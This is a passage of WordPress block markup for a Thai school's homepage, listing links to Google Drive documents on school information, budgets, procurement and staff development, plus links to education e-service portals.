class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":418,\"width\":\"566px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:566px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 